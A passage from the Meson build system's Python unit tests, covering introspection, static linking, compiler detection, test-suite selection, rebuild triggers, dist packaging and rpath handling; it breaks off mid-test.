'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officialy in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows():
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildAppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.XildLinuxDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertRebuiltTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertRebuiltTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def dist_impl(self, vcs_init):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
